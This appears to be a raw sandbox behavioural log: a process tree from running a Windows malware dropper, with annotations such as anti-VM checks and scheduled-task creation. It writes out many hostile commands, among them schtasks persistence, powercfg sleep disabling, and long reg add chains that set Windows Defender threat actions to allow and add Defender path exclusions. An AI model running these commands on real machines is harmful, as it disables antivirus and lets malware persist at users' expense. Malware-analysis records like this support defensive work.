C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:85⤵PID:4400
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\78YNmFGpHqyB8VHcAL5S.exe"C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\78YNmFGpHqyB8VHcAL5S.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:704
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\TBRWJhIKnh2MD8sNTiD1rDIz.exeC:\Users\Admin\Documents\SimpleAdobe\TBRWJhIKnh2MD8sNTiD1rDIz.exe2⤵
- Executes dropped EXE
PID:3544
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 408 -ip 4081⤵PID:3324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:624
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:804 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3392
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6136
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe LY /nlfdidcOwS 525403 /S1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4524
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:7044
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:7136
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6504
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:3776
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:6136
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:7072
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5184
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:928
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5916
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:1488
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:7124
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:6416
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6448
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6480 -
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6480" "2388" "2356" "2396" "0" "0" "2400" "0" "0" "0" "0" "0"6⤵PID:3980
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 5802⤵
- Program crash
PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6936
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6924 -ip 69241⤵PID:7044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2264
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5500
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
PID:5296
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe LY /nlfdidcOwS 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5180
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:6492
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:6768
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6868
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:6328
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:6880
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:6608
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:4192
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Process spawned unexpected child process
PID:3936 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3644
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:6264
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:760
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:5036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4684
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7088 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:6684
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3260 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6340
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5508
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:6648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:7000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:764
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t 